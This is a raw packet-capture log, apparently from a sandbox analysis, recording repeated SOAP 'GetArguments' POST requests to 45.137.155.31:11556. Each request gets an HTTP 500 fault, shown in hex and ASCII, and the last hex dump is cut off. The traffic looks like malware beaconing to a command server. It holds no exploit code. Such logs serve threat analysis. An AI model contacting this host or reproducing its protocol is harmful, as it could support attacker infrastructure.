                                  Aug 3, 2021 23:08:38.016057968 CEST1039INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:37 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:39.024693966 CEST1048OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:39.095200062 CEST1053INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:39.572225094 CEST1056INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:39 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:41.002532959 CEST1067OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:41.071475029 CEST1067INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:41.141886950 CEST1068INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:40 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:42.211414099 CEST1088OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:42.282383919 CEST1089INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:42.371978998 CEST1091INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:42 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:43.383331060 CEST1105OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:43.454222918 CEST1105INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:43.525957108 CEST1111INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:43 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:44.539746046 CEST1127OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:44.608695984 CEST1131INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:44.682656050 CEST1132INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:44 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:08:45.696274042 CEST1145OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:08:45.774158001 CEST1147INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:08:45.843389034 CEST1148INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:08:45 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 